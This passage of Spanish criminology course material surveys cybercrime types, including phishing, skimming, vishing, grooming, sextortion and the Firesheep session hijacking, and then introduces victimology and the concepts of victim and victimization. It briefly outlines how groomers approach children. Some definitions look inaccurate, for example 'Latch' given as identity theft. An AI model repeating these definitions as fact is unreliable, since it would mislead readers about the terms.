El software poco seguro que añaden las empresas de telefonía móvil y los fabricantes
de dispositivos genera el 60 por ciento de las amenazas de seguridad del ecosistema
Android. Todas esas aplicaciones e interfaces molestas que incorpora el teléfono reciben
el nombre de bloatware (software inflado o innecesario) porque ocupan espacio del
dispositivo, poseen un valor dudoso y únicamente funcionan como trucos comerciales
para el fabricante del dispositivo o la operadora de wifi. No solo son fastidiosas, sino que
su implementación realizada sin demasiado análisis propicia la mayoría de las amenazas
a la seguridad que afectan a los dispositivos Android.
Los teléfonos móviles secuestrados se utilizan cada vez más para enviar mensajes
de correo electrónico no deseado al conectarse a las redes botnets (red de robots
informáticos que se ejecutan de manera autónoma y automática).
• Spoofing: en términos de seguridad de redes hace referencia al uso de técnicas

de suplantación de identidad generalmente con usos maliciosos. Se pueden

clasificar los ataques de spoofing en función de la tecnología utilizada («IP
spoofing», «ARP spoofing», «DNS spoofing», «Web spoofing», «email spoofing o
real mail spoofing»), se puede englobar dentro de spoofing cualquier tecnología
de red susceptible de sufrir suplantaciones de identidad.
Ilustración 6. Tipos de ataques spoofing. Fuente: panda security
• Latch: es el robo de identidad, robo de datos como identidades de usuarios,

cuentas de mail, números de tarjetas de crédito, bancarias, etc.
ESTAFAS INFORMÁTICAS
Esta modalidad suele ser el volumen más significativo de las investigaciones penales
en el ámbito de la ciberdelincuencia, a lo que hay que sumar la dificultad de su
investigación porque los autores suelen estar en terceros Estados, la cuantía defraudada
es mínima y hay una gran dispersión geográfica de las víctimas; además, la mejora de la
infraestructura criminal para recoger el dinero con menor riesgo ha implicado la creación
de «mulas» con uso de identidades falsas para la creación directa de una cuenta en la
que recepcionar los fondos, que se retirarán posteriormente en un cajero automático
(García de la Concha, 2014).
Entre las estafas más comunes figuran (Fernández-Reyes, 2016):
• Cartas de estafa o timo: son un tipo de fraude. Se lleva a cabo principalmente

por correo electrónico no solicitado.
Esta estafa consiste en ilusionar a la víctima con una fortuna inexistente y

persuadirla para que pague una suma de dinero por adelantado, como condición
para acceder a la supuesta fortuna. Las sumas solicitadas son bastante elevadas,

pero insignificantes comparadas con la fortuna que las víctimas esperan recibir.
Ilustración 7. Ejemplo de carta de estafa.
• Phishing o suplantación de identidad: se comete mediante el uso de un tipo

de ingeniería social caracterizado por intentar adquirir información confidencial
de forma fraudulenta (como puede ser una contraseña o información detallada
sobre tarjetas de crédito u otra información bancaria). El cibercriminal, conocido
como phisher, se hace pasar por una persona o empresa de confianza en una
aparente comunicación oficial electrónica, por lo común un correo electrónico, o
algún sistema de mensajería instantánea o incluso utilizando también llamadas
telefónicas.
Ilustración 8. Ejemplo de phising.

• Pharming: es la manipulación de la resolución de nombres en Internet a través

de algún código malicioso introducido en el equipo, mediante descargas,
correos electrónicos, etc.
• Carding: consiste en la obtención de los datos de tarjetas de crédito, números
secretos, banda magnética, el número de seguridad de una tarjeta (CCV, CVV2,
CVC2, o CID. El número de verificación es un número que no está en relieve y
que se encuentra impreso en la tarjeta.
• Skimming: es el duplicado o clonación de tarjetas de crédito o débito. Consiste
en la lectura no autorizada y almacenamiento de la información contenida en
la banda magnética de tarjetas bancarias mediante la utilización de dispositivos
electrónicos, que simulan ser los autorizados, o por personas con acceso a estos
medios de pago (Costa, 2012).
• Spear Phishing: (pesca con arpón de forma literal) es una técnica que no envía
mensajes fraudulentos en masa a millones, sino que selecciona con esmero a
personas u organizaciones concretas. Es la herramienta predilecta para quienes
cometen espionaje industrial. Los ataques phishing se han hecho epidémicos.
Hasta la fecha, más del 90 % de las brechas de seguridad han comenzado con
un ataque de estas características.
Ilustración 9. Ejemplo de Spear Phising
• Scam: son intentos de estafa a través de un correo electrónico fraudulento (o

páginas web fraudulentas). Generalmente, se pretende estafar económicamente
por medio del engaño presentando una supuesta donación a recibir o un
premio de lotería al que se accede previo envío de dinero. Las cadenas de
correos electrónicos engañosas pueden ser scams, si hay pérdida monetaria, y
hoax cuando solo hay engaño.

Ilustración 10. Ejemplo de Scam
• SMiShing: es una variante del phishing, utiliza los mensajes a teléfonos

móviles, en lugar de los correos electrónicos, para realizar el ataque. El resto
del procedimiento es igual al del phishing, es decir, el estafador suplanta la
identidad de una entidad de confianza para solicitar al usuario que facilite sus
datos, a través de otro SMS o accediendo a una página web falseada, idéntica a
la de la entidad en cuestión.
• Programas pump-and-dump: son mecanismos de piramidación mediante
la adquisición de acciones de compañías para inflar su valor comercial y,
posteriormente, venderlas para obtener ganancias antes de que su precio se
desplome en las bolsas de valores.
• Vishing: fraude que persigue el mismo fin que el phishing, la obtención de
datos confidenciales de usuarios, pero a través de un medio distinto, la telefonía
IP. Contactar telefónicamente con el usuario, un mensaje automático que le
solicita el número de cuenta, contraseña, código de seguridad, etc. Utilización
de un programa que realice llamadas automáticas a números de teléfono de
una zona determinada.

Ilustración 11. Ejemplo de vishing.
PROBLEMAS PERSONALES Y OTRAS CONDUCTAS CONTRA LAS

PERSONAS
Entre ellos, se pueden citar las siguientes:
• Adicciones: a videojuegos, juegos monetarios, redes sociales (RRSS),

Whatsapp y nuevas tecnologías.
• Sexcasting: vídeos online erótico, pornográficos, a través de las webcams.
• Morphing: montaje fotográfico, usado posteriormente para coaccionar y
chantajear a la víctima.
• Ciberbullying: acoso usando las nuevas tecnologías.
A continuación, se analizarán un poco más en profundidad otros que tienen una gran
relevancia actualmente (Fernández-Reyes, 2016):
GROOMING/CHILD GROOMING/ACOSO O ABUSO INFANTIL EN

LÍNEA
Es la acción encaminada a establecer una relación y control emocional sobre un niño,
cuya finalidad última es la de abusar sexualmente del NNA.
Se lleva a cabo mediante el engaño de una persona adulta a un NNA a través de RRSS/
chats, para obtener imágenes de contenido erótico del NNA que después utilizará para
coaccionarle, bajo amenaza de difundir esas imágenes a sus conocidos, y conseguir así
más imágenes o incluso llegar a materializar el abuso.
Los depredadores de niños recurren a las tecnologías para canalizar sus esfuerzos hacia

los niños con fines pederastas. Dado que los pedófilos tienen preferencias concretas con
respecto a los niños a quienes persiguen, cualquier fotografía publicada en las redes
sociales o en cualquier otro lugar de Internet puede utilizarse como catálogo de ventas o
como un mercado virtual para pederastas y pedófilos en busca de víctimas.
Los pedófilos se esfuerzan por estar al corriente de los últimos juegos, servicios de
mensajería y mundos virtuales de interés para los niños, y buscarán a sus víctimas en
todos los foros online existentes.
Ilustración 12. Grooming
Estos acosadores suelen tener un perfil general (García de la Concha, 2014) que los sitúa:
• En una edad entre los 30 y los 50 años.

• Aparentan ser normales, pero son inseguros, inmaduros.
• Tener un grave desajuste de personalidad.
Los pedófilos, según García de la Concha (2014), suelen seguir una técnica para atraer a
sus víctimas:
• Ingreso en el chat con un nombre de usuario llamativo.

• Atracción de la víctima hacia un privado.
• Tratar de obtener imágenes a través de la webcam mediante engaños.
En este sentido, los llamados «cappers» son los que forman parte de la
tendencia por la que bandas de pedófilos online disfrutan convenciendo a
niños para que se desnuden ante la cámara y los graban.
• Posteriormente, los pedófilos desvelan su identidad real y utilizan luego
esos vídeos para chantajear a los adolescentes para que realicen actos
sexuales más explícitos tanto online como en persona (Goodman, 2015 ).

Ilustración 13. Paso a paso del grooming.
SEXTORSIÓN
Es la extorsión sexual (o de otro tipo) derivada del bullying, grooming, sexting. Aprovechando
los datos que se filtran a diario o disponibles a través de los agentes intermediarios,
los ciberacosadores pueden obtener fácilmente información detallada acerca de sus
víctimas, incluidas las direcciones de sus casas y sus trabajos y sus números telefónicos.
A menudo, los ciberacosadores usan estos detalles para confrontar a sus víctimas en
persona.
En las relaciones que han sufrido violencia doméstica en el mundo real, el 45% de las
víctimas admitieron que sus maltratadores las persiguieron y atacaron también online,
llegando a provocar que muchas de ellas padezcan síndrome de estrés postraumático.
Los datos que damos en las redes sociales también aportan información relativa a nuestra
localización y, a efectos prácticos, algo tan peligroso como una bala (Goodman, 2015).
Sitios web como MyEx.com permiten a quienes han sido plantados compartir fotografías
de sus examantes en un único sitio web. Hunter Moore, un joven de 24 años, creó IsAnoneUp.
com, un sitio web extraordinariamente popular que sirve de almacén de datos para
cualquiera que quiera enviar fotografías de sus exparejas y enemigos desnudos, y que
recibe 250 000 visitas diarias. El sitio web está diseñado para listar junto a cada fotografía
enlaces a las cuentas de Facebook o Twitter de la persona, e incluye su nombre completo

y su lugar de nacimiento, información perfectamente indexada y recuperable en Google,
que aparecerá en cualquier búsqueda inocente que un tercero efectúe por el nombre de
esa persona (Goodman, 2015).
ENGAÑOS EN LAS REDES SOCIALES

Los delincuentes engañan a sus victimas para que hagan clic en enlaces de publicaciones
y mensajes que supuestamente corresponden a amigos o colegas mediante una técnica
conocida como «ingeniería social».
Se aprovechan de la confianza que depositan en aquellas personas en las redes
sociales camuflándose electrónicamente como personas de confianza y engatusando
invariablemente a infectarles las computadoras con un virus, un troyano o un gusano.
Las mafias organizadas reaccionan extremadamente rápido a las últimas noticias, que
utilizan para embaucar a los usuarios inocentes para que cliquen en un enlace e infectar
así sus computadoras (Goodman, 2015).
Uno de los programas de software malicioso más conocido para las redes sociales es
Koobface e iba destinado a usuarios de Facebook de todo el mundo. El dañino gusano
concebido para las redes sociales se propagaba engañando a los usuarios para que
hicieran clic en un enlace de Facebook con un titular demasiado seductor como para
pasarlo por alto.
Ilustración 14. Engaños en las redes sociales.
Una vez infectado, el gusano de Koobface roba todas las credenciales de inicio de sesión
que es capaz de encontrar en la computadora, incluidas las de las cuentas de Facebook,
Skype, Yahoo!, Messenger y Gmail. Koobface también puede forzar a la computadora a
participar en ataques de denegación de servicio contra terceros y secuestrar resultados
de búsquedas en la red y clics para conducirlos a sitios web peligrosos.
Firesheep era un sencillo módulo del navegador de Firefox que se podía descargar
para colarse en la sesión de Facebook de otras personas conectadas a la misma red
y secuestrar sus cuentas. De esta manera, si, por ejemplo, se comprobaba la cuenta de
Facebook en un lugar público donde se comparte la red con otras veinticinco personas,
y una de ellas ejecutaba Firesheep, podía utilizar el módulo para conectarse en la cuenta
de Facebook de alguien más. Una vez iniciada la sesión, el delincuente puede consultar

toda la información personal, modificar la configuración de la cuenta y publicar lo que
quisiera en el muro o enviar mensajes a otros usuarios. Esta técnica se conoce como
«secuestro de sesión» o sidejacking (Goodman, 2015).
El perfil en las redes sociales también puede hacerse vulnerable a otro tipo de ataque, un
delito motivado por la discriminación y discurso de odio. Los datos en Internet permiten a
los criminales localizar a víctimas basándose en sus preferencias (Goodman, 2015).
SEXTING
Es el envío de fotografías de carácter íntimo/erótico/sexual, a través de las TIC, tratándose
hoy en día de un fenómeno casi global, en cuya práctica se involucran tanto adolescentes,
jóvenes y jóvenes-adultos (Agustina y Gómez-Durán, 2016).
Agustina y Gómez Durán (2016) lo definen específicamente como «la utilización de cualquier
herramienta informática mediante la que cualquier individuo crea y envía a otro individuo
(o individuos) cualquier tipo de mensaje de texto, imagen o vídeo de naturaleza sexual, ya
sea con carácter sugestivo o explícito, de uno mismo y/o de otra persona(s) que, en todo
caso, consiente su participación libremente»; e incluye las siguientes tipologías:
• Soft sexting, que incluiría las conductas de enviar, publicar en línea

(posting), recibir o compartir mensajes sexualmente sugestivos a otra o de
otra persona a través de un medio electrónico como pueden ser correo
electrónico, mensajería instantánea, red social…
• Hard sexting, comprende las mismas acciones mencionadas anteriormente
donde el sujeto se muestre desnudo o semidesnudo en las fotografías o
vídeos.
•
2. Enfoque criminológico de
la víctima del ciberdelito.
2.1. Concepto y objeto de la victimología
La palabra victimología deriva del término inglés “victimology” cuya aparición se remonta
a los años cuarenta, aunque su consolidación no llega hasta los años setenta. Desde su
origen es concebida como la disciplina que se ocupa del estudio científico de las víctimas
y así lo entendía Mendelsohn quién se atribuía la paternidad de esta nueva disciplina.
También se atribuye a Von Henting el título de pionero de la victimología a raíz de su obra

“The criminal and his victims” (1948). Ambos desarrollaron las tipologías victimales en una
labor de clasificación de las víctimas.
La ulterior evolución de la Victimología se debe en gran medida a los Simposios
internacionales en los que se ha desplegado el intercambio de criterios y estudios entre
investigadores de diferentes especialidades, desarrollándose catorce encuentros de esta
magnitud, desde el Primer Simposio sobre Victimología celebrado en Jerusalén, Israel, en
1973, donde se concibió a la Victimología como el estudio científico de la víctima, hasta el
año 2012 en la Haya.
En la primera monografía que se publicó en Italia sobre esta especialidad (1976) G. Gulotta
la definió como “la disciplina que tiene por objeto el estudio de la víctima de un delito,
de su personalidad, de sus características biológicas, psicológicas, morales, sociales y
culturales, de sus relaciones con el delincuente y del papel que ha desempeñado en la
génesis del delito”.
En la actualidad Tamarit Sumalla define a la victimología como la CIENCIA MULTIDISCIPLINAR
(ya que toma conceptos de la criminología, del derecho penal, de la psicología y/o
psiquiatría) que se ocupa de los procesos de victimización y desvictimación, es decir:
estudia el modo en que una persona se convierte en víctima de un delito, de las diferentes
dimensiones de la victimización (primaria, secundaria y terciaria), las estrategias de
prevención y reducción de dicha victimización y el conjunto de respuestas sociales
jurídicas y asistenciales cuya finalidad es la reparación y reintegración social de la víctima.
a) Se trata por lo tanto de una ciencia de reciente aparición que centra su atención
en la gran olvidada por las ciencias penales y criminológicas: la víctima y sus
dificultades, necesidades y derechos.
b) La victimología es una ciencia multidisciplinar que se nutre de distintas disciplinas
para conseguir su finalidad. El criminólogo tendrá que utilizar diferentes métodos
de estudio para conseguir sus objetivos.
c) Podemos determinar que a la victimología se la atribuye el objetivo de desarrollar,
a través del estudio en profundidad de la víctima, un conjunto de reglas y de
principios comunes que contribuyan a la evolución de las ciencias criminológicas y
jurídicas para la comprensión del fenómeno criminal, de la dinámica criminógena
y de la personalidad del delincuente. Así en cada cultura, momento histórico o
contexto sociológico, cabe asignar un modelo diferenciado de victimología.
d) La victimología se ocupa de los procesos de victimización y desvictimación. La
victimización es el proceso por el que una persona sufre las consecuencias de un
hecho traumático y la desvictimación es el proceso de reparación de las víctimas
como reconocimiento social, asistencia y reintegración social.
La victimología debe focalizar la atención sobre la víctima a varios niveles, ya que esta
juega un nuevo papel en la interacción con los otros protagonistas del hecho delictivo:
1. Etiológico: la moderna victimología debe explicar la interacción delincuente-

víctima y cuáles son las variables que influyen en dicha interacción. Han
de buscarse explicaciones al hecho de cómo percibe el delincuente a su
víctima, o como percibe esta al criminal o las diferentes actitudes posibles
entre ambas figuras (modus operandi, elección de la víctima).
2. Prevención del delito: la victimología debe tener por objeto la prevención

del delito desde el punto de vista de la víctima. Si se detectan determinados
factores de vulnerabilidad que aumentan el riesgo de victimización, podrá
llevarse a cabo una labor de concienciación en las potenciales víctimas para
que estas aumenten las medidas de prevención frente a la comisión de un
hecho delictivo sobre su persona.
3. Metodología: se ha de poner un esfuerzo especial en la realización de
encuestas de victimización ya que estas son la mejor, mayor y más fiable
información sobre la realidad criminal en una sociedad. Dichas encuestas
nos ofrecen información que nos proporcionará los medios necesarios para
formular hipótesis que expliquen la delincuencia, así como para diseñar
programas para la prevención del delito.
4. Política social respecto a la víctima: la víctima también necesita una correcta
resocialización a través de la intervención de los poderes públicos, a través
de programas de tratamiento eficaces. En algunos países se han puesto en
marcha programas de asistencia y tratamiento de las víctimas entre los que
podemos destacar:
• Programas de asistencia inmediata, ofreciendo necesidades de tipo

material, psicológico y físico.
• Programas de reparación por el propio infractor, mediante el pago
de una cantidad de dinero o de la realización de alguna actividad en
beneficio de la víctima.
• Programas de compensación, en forma de seguros o indemnizaciones.
• Programas de asistencia a las víctimas, sobre si esta ha de intervenir
como testigo en el proceso contra el delincuente.
5. Efectividad del sistema legal: estudiar las causas de por qué algunas víctimas
no denuncian los delitos, ya que solo se persiguen aquellos que son denunciados.
Además, la información que aporta la víctima es muy valiosa de cara a posteriores
investigaciones de los fenómenos criminales, hecho que puede beneficiar
enormemente al sistema legal.
Por lo tanto, el objeto de la victimología según Ch. N. Robert (1979) podría quedar definido
por:
1. El estudio del papel desempeñado por las víctimas en la génesis del hecho criminal.
2. La problemática de la asistencia jurídica, moral y terapéutica a las víctimas de un
delito.
3. La investigación de los temores de determinados grupos sociales a la victimización.
4. El examen de la criminalidad real, a través de los informes facilitados por las
víctimas de delitos no perseguidos.
5. Hacer hincapié en la importancia de la víctima dentro de los mecanismos de
reacción de la justicia punitiva y de determinación de las penas.
6. Propiciar la elaboración de disposiciones legales que permita a las víctimas obtener
una indemnización por los daños derivados del hecho delictivo.

La victimología ha generado y sigue generando controversias y críticas. Se ha defendido
que no es una disciplina científica ni un ámbito académico. También se ha considerado
que constituye una amalgama de ideas y conocimientos fragmentados, principalmente
basados en teorías sociológicas, pero sin una línea teórica de pensamiento victimológico
común que haya permitido el desarrollo de teorías propias (Jaishankar, 2008). Así, durante
años ha existido una gran controversia científica que dividía a los criminólogos en:
• Autonomistas: defensores de la victimología como una ciencia autónoma

e independiente con objeto, método y finalidad propios (Mendelsohn,
Drapkin o Aniyar).
• Integradores: aquellos que incluyen a la victimología como una parte o
rama de la criminología, negándole su autonomía científica. Consideran
que la criminología abarca el estudio de las víctimas de modo que no es
necesaria una ciencia independiente (Fattah, Gulotta o Goldstein).
• Negadores: no solo niegan la autonomía de la victimología sino incluso la
posibilidad de su existencia (Jiménez de Asúa, Kaiser o López Rey).
2.2. Definición de víctima

La víctima es la persona que padece un daño por culpa propia, ajena o bien por una causa
fortuita. Desde el punto de vista jurídico una persona es victimizada cuando cualquiera
de sus derechos ha sido violado a través de una acción criminal.
Durante muchos años la víctima del delito fue ignorada. El delincuente desempeñaba el
papel protagonista, de modo que el delito se explicaba en función de las características
del sujeto activo o delincuente. La víctima aparecía como ese “objeto, neutro, pasivo,
estático, fungible que nada aporta a la génesis del hecho criminal” (García-Pablos,
Manual de criminología, página 76).
Partiendo de un punto de vista etimológico, la palabra víctima proviene del latín y significa
persona o animal sacrificado o sacrificio. Este concepto ha evolucionado. Históricamente,
cuando una persona era víctima de algún delito podía vengarse libremente pasando
después a ponerse limite a este libre albedrío a través de la Ley del Talión que fue una
medida de justicia, hasta llegar a los conceptos actuales. En la actualidad la víctima es
aquella persona (física o jurídica) que es sujeto pasivo de un delito (desde un punto de
vista penal) y que padece un daño por culpa propia, ajena o bien por una causa fortuita.
Resulta importante la valoración que expone que “la víctima nace y se perfila en el seno
de la pareja criminal “delincuente-víctima”, por ello inicialmente no hay más víctima que
la persona humana, la persona física, un sujeto que configura el hecho criminal el autor
del mismo y que contribuye a su propia victimización.
Esta acepción es muy restrictiva ya que excluye los comportamientos individuales
dirigidos contra las personas jurídicas, es indiscutible que las organizaciones, la sociedad
misma, el Estado o la Comunidad Internacional pueden ser también víctimas del delito”.
(Méndez, M., Pérez, A. y Arjona, P. 1996, párrafo 11).
• El concepto de víctima en un sentido amplio: toda persona física, jurídica

o colectivo humano que ha sido objeto por factores externos a los

mismos, de un perjuicio o menoscabo en su entorno físico, psicológico,
moral, económico o afectivo, del que es consciente y del que puede o no
conocer la causa o autor del mismo y puede precisar o no de retribución
o reparación del mismo.
• El concepto de víctima en un sentido estricto: se entiende por víctima del
delito a toda persona física, jurídica, colectivo humano, animal u objeto,
cuyos bienes jurídicos han sido lesionados por agentes externos (persona
físicas o jurídicas), que precisan de una respuesta jurídica, económica y
efectiva en aras de reparar el daño sufrido y retribuir los costes materiales
ocasionados.
Una de las definiciones más completas es la propuesta por la Asamblea general de

la Naciones Unidas en su Declaración sobre los Principios Fundamentales de Justicia
para las Víctimas de Delitos y del Abuso de poder (1985): “Se entenderá por víctimas las
personas que individual o colectivamente hayan sufrido daños, inclusive lesiones físicas
o mentales, sufrimiento emocional, perdida financiera o menoscabo sustancial de sus
derechos fundamentales, como consecuencia de acciones u omisiones que violen la
legislación penal vigente en los estados miembros, incluida la que proscribe el abuso de
poder”.
Dicha declaración reconoce un conjunto de derechos de las víctimas que son los
siguientes:
• Información: relativo al proceso penal y a los recursos y prestaciones a los

que la víctima tiene derecho.
• Protección: referida a medidas dirigidas a minimizar el impacto del
proceso y a velar por su seguridad frente a amenazas o represalias.
• Participación: respecto a ser escuchada y a canalizar sus demandas
y pretensiones en el proceso, por ejemplo, mediante los denominados
victim impact statements.
• Asistencia: o lo que ha venido a llamarse victimo asistencia, no únicamente
relativa al ámbito jurídico, a la que se suele denominar indemnización
pública, sino también ayuda psicológica, psiquiátrica y programas de
apoyo social, a través de oficinas públicas o servicios independientes,
con financiación, en todos los casos, a cargo de fondos públicos, que
ayuden a la víctima a resolver o atenuar los problemas derivados de su
victimización.
• Reparación/indemnización: comprendiendo, aparte de la reparación del
daño y la compensación económica, también una dimensión inmaterial,
que puede concretarse, por ejemplo, en una conducta del victimario en el
marco de un proceso restaurativo.
La víctima puede ser individual o colectiva incluyendo a grupos, clases o comunidades de

individuos, corporaciones económicas o comerciales y grupos u organizaciones políticas.
Dentro de este concepto se incluye además a familiares o personas a cargo que tengan
relación inmediata con la víctima directa y los que hayan sufrido daños al intervenir para
asistir a la víctima en peligro o para prevenir la victimización. Desde un punto de vista
jurídico se tiene en cuenta el bien jurídico protegido y que la conducta este tipificada en
la ley penal.

CONCEPTO JURIDICO DE VICTIMA: jurídicamente la víctima la relacionamos con
la figura del perjudicado, que en muchas ocasiones será el sujeto pasivo del
delito. El perjudicado es la persona física o jurídica que a consecuencia de la
comisión de un delito sufre un daño, mientras que el sujeto pasivo será el titular
del bien jurídico protegido o puesto en peligro. Por ejemplo: en un delito de
lesiones el perjudicado y el sujeto pasivo es el mismo. Sin embargo, en el robo a
una tienda de ropa, roban a la empleada, pero los bienes robados son del dueño
de la tienda.
La víctima, como sujeto pasivo de la acción criminal, sufre sus consecuencias. Unas
consecuencias que pueden ser tanto físicas, como emocionales, económicas o socio-
culturales. Las lesiones, el insomnio por las pesadillas donde se repite la agresión,
la pérdida de patrimonio o la marginación social que algunas sociedades o culturas
imponen a la víctima de una violación, por ejemplo, son ejemplos de cada una de estas
consecuencias, aunque no agotan, ni muchísimo menos, la lista posible.
Piénsese, en la situación de la madre de Sandra Palo, una muchacha de 22 años con
discapacidad intelectual que en 2003 se encontró con un grupo de chicos. Estos abusaron
de ella de un modo horrendo, violándola repetidamente, golpeándola con una estaca,
atropellándola con el mismo coche en que la secuestraron previamente hasta siete veces
y, después, como aún seguía viva, rociándola con un bidón de gasolina y prendiéndole
fuego. Uno de ellos, precisamente el que la atropelló reiteradamente, sólo es condenado
a 4 años, por ser menor. Ya ha salido de prisión. La madre de Sandra Palo es una víctima
también y su sufrimiento no se podrá frenar. Las secuelas no sólo son emocionales. A partir
de ese momento no se relacionará con normalidad con su entorno e incluso desconfía
de la policía y de la justicia, porque toda condena debe parecerle poca.
Rodríguez Manzanera define a la víctima desde un punto de vista victimológico general
como el individuo o grupo que padece un daño por una acción u omisión propia o
ajena, o por causa fortuita. Desde un punto de vista victimológico criminal se refiere a la
víctima como a la persona física o moral que sufre un daño producido por una conducta
antisocial, propia o ajena, aunque no sea el detentador del derecho vulnerado.
2.3. Victimización y desvictimización. Concepto y clases

de victimización
La victimización es el proceso por el cual una persona sufre las consecuencias de un
hecho traumático de forma directa llegando a ser víctima. Para el estudio de este proceso
debemos tener en cuenta dos aspectos: los factores que intervienen en la precipitación
del hecho delictivo o traumatizante (vinculado al concepto de víctima de riesgo) y el
modo en que esa persona vive la experiencia de victimización (vinculado al concepto de
víctima vulnerable).
La víctima de riesgo es aquella persona que tiene más probabilidades de ser víctima
(discapacitados, prostitutas, inmigrantes) y la vulnerable es aquella que tras un suceso

traumático sufre una mayor afectación psicológica en base a una previa precariedad
emocional, material o personal como por ejemplo los niños o los ancianos.
El proceso de victimización constituye un entramado de complejos factores que
interactúan con las secuelas que el hecho criminal deja en la víctima. Esos aspectos
pueden ser de dos tipos:
• Las secuelas psicológicas, que son las propias del hecho de victimización
o del impacto traumático (trastorno de estrés postraumático, depresión,
ansiedad, etc.).
• Las relativas al sistema sociopolítico, es decir, la estabilidad económica-
laboral, el apoyo social, etc.
En las víctimas se producen varias fases de reacción ante la victimización:

1. Primera: Es una reacción inicial de rabia, temor, venganza, etc. Se trata por lo tanto
de una reacción de choque o puede tratarse de una reacción de adaptación.
2. Segunda: Una reacción de desorganización a efectos psicológicos.
3. Tercera: Una reacción de adaptación y de elaboración.
Podemos decir por lo tanto que en el proceso de victimización hay una serie de puntos
definitorios del mismo:
1. La aparición de un conjunto de secuelas negativas en la víctima tras la experiencia
del hecho.
2. Las consecuencias pueden experimentarse tanto de manera directa como
indirecta.
3. Fenómeno complejo y multicausal donde intervienen multitud de elementos que
condicionan y definen la respuesta del sujeto como única.
Fattah (1993, páginas 121 y siguientes) ha señalado que la victimización es una experiencia
individual, subjetiva y relativa culturalmente. Así el estudio de la victimización obliga a
considerar los factores de carácter individual, social y cultural que determinan el hecho
de que una persona pueda llegar a ser víctima. Además, estos factores condicionaran y
modularan el modo de vivir esa experiencia como víctima.
¿CUÁLES SON LOS FACTORES DE PRECIPITACIÓN EN LA

VICTIMIZACIÓN?
FACTORES INDIVIDUALES
Nos referimos a las diferencias individuales relevantes como la edad, el género o las
características de personalidad. Esta última modula la respuesta individual al hecho
traumático sufrido que puede determinar el riesgo de nuevos hechos victimizantes e
incluso la aparición de situaciones de victimización crónica.

COMPORTAMIENTO DE LA VÍCTIMA
Interesan especialmente los factores relativos al estilo de vida (exposición de esa persona
a situaciones de riesgo), adoptar comportamientos peligrosos bien de provocación o
de disminución de la autoprotección o actitudes poco precavidas en la defensa de sus
bienes jurídicos (ejemplo: dejar bienes de valor dentro de un coche en un lugar que no
sea seguro). El contacto con delincuentes y con actividades ilegales como la trata de
personas o el tráfico de drogas son una gran fuente de riesgo.
OFENSORES
Las características del victimario, su relación con la víctima, las motivaciones que le llevan
a escoger a esa victima son en determinados casos elementos clave. Algunos sucesos
victimizantes se explican por estas consideraciones unidas además a la oportunidad,
cuando se trata de víctimas que son elegidas al azar.
OPORTUNIDAD
Los factores de oportunidad son algunos de los elementos externos a la víctima que
tienen un mayor poder de explicación de la victimización sufrida por algunas personas.
Muy importantes son la ausencia o escasez de recursos de seguridad y la peligrosidad de
determinados espacios (descampados, calles solitarias) y tiempos (madrugadas).
FACTORES SOCIALES
Aquí podemos incluir todos los riesgos derivados de la estructura social, los elementos
ambientales, la estigmatización o marginación de determinados colectivos que se les
puede identificar como objetivos para ser agredidos.
A la victimización se llega por procesos diversos:
• El incremento de una delincuencia agravada en sus modalidades

delictivas o la aparición de nuevas formas de criminalidad.
• Los daños ocasionados en las víctimas y en la sociedad.
• La impunidad en el accionar de los delincuentes, especialmente en la
criminalidad organizada.
• La alta vulnerabilidad de las víctimas.
• Los altos costes económicos y sociales de la delincuencia.
• El colapso institucional y policial y de la administración de justicia.
• El fracaso del sistema penitenciario en la recuperación individual y social
del delincuente.
• La carencia de una asistencia ayuda a las víctimas del delito.
• El fracaso de las penas tradicionales, vinculadas a la alta reincidencia
delictiva.
• La carencia de investigaciones sobre criminalidad que permitan conocer
las formas de delincuencia por regiones e implementar las medidas
preventivas adecuadas.

• La carencia de personal especializado en los proyectos y aplicación de
medidas de prevención asociadas.
Si la victimización es el mecanismo o procedimiento en virtud del cual una persona llega

a ser víctima ¿sería posible en estos casos la autovictimización? La respuesta es sí.
Estaríamos ante una autovictimización no punible cuando una persona se corta las venas
con la clara intención de quitarse la vida. Sin embargo, también hay una autovictimización
punible en el caso de aquellas personas que se autolesionan para cobrar ilícitamente
una indemnización o bien para simular un delito de violencia de género.
La desvictimación podemos definirla como un proceso de reparación o reconstrucción
(López, 1997 página 172). Estamos ante una etapa que es posterior al de la comisión
del ilícito penal y posterior al juicio. Consiste en el proceso de reparación, entendida no
sólo como indemnización de perjuicios, sino como reconocimiento social, asistencia y
reintegración social ya que se debe evitar la revictimización.
Es fundamental la reintegración social y evitar la estigmatización de la víctima, la
explotación de la condición de víctima real o supuesta, la instalación crónica en la
victimación, así como la construcción de una “sociedad de víctimas”.
Lo fundamental es la reintegración social de la víctima real una vez que se ha producido
el hecho traumático a través de la intervención de diferentes elementos ya que toda
acción preventiva debe tener como objetivo las víctimas potenciales, las víctimas reales.
Los actores que realizan esta tarea son principalmente el sistema de justicia penal, las
fuerzas de seguridad, los servicios sociales y los profesionales médicos o psicólogos
que realizan labores de asistencia. Sin embargo, la proyección social adquirida por las
víctimas amplía estos actores a los responsables políticos, los medios de comunicación o
los agentes morales como las instituciones religiosas. Asimismo, también influyen en este
proceso las entidades de apoyo a las víctimas y las asociaciones de víctimas.
En cuanto a los tipos de victimización:
1. Según la naturaleza de la infracción podemos hablar de victimización antisocial

y victimización criminal. La primera no es constitutiva de delito y es aquella en la
que se produce un daño no delictivo (Lo injusto no siempre es ilegal). La criminal es
aquella en la que el daño que se produce está tipificado como delito en el código
penal.
2. Según la extensión del hecho podemos hablar de victimización directa, que es
aquella en la que el ilícito penal o delito recae sobre la víctima en si (asesinato
o atropello con lesiones) y la indirecta que es aquella que se genera como
consecuencia de la victimización directa y recae sobre aquellas personas que
tienen una estrecha relación con la persona agredida (familia, amigos, pareja, etc.)

2.4. Victimización primaria, secundaria y terciaria
En función de la naturaleza del delito, de la personalidad de cada uno de los sujetos
pasivos y de una amplia gama de circunstancias concurrentes, se derivan muy diferentes
consecuencias de la infracción penal para las víctimas.
VICTIMIZACIÓN PRIMARIA
Es el proceso por el que una persona sufre de modo directo o indirecto, daños físicos
o psíquicos derivados de un hecho delictivo o acontecimiento traumático. Este tipo de
victimización implica un contacto directo entre la víctima y el delincuente o victimario y
refleja la experiencia individual de la víctima y las diversas consecuencias perjudiciales
primarias producidas por el delito, de índole física, económica, psicológica o social.
Los daños experimentados por la víctima no se limitan a la lesión o puesta en peligro del
bien jurídico del que se es titular ya que la víctima sufre a menudo un severo impacto
psicológico que incrementa el daño material o físico del delito. También la impotencia
ante la agresión sufrida o el miedo a que esta se repita producen en la víctima ansiedad,
angustia o abatimiento e incluso sentimientos de culpabilidad en relación a los hechos
acaecidos.
Las personas que han sido víctimas de un delito se encuentran permanentemente en un
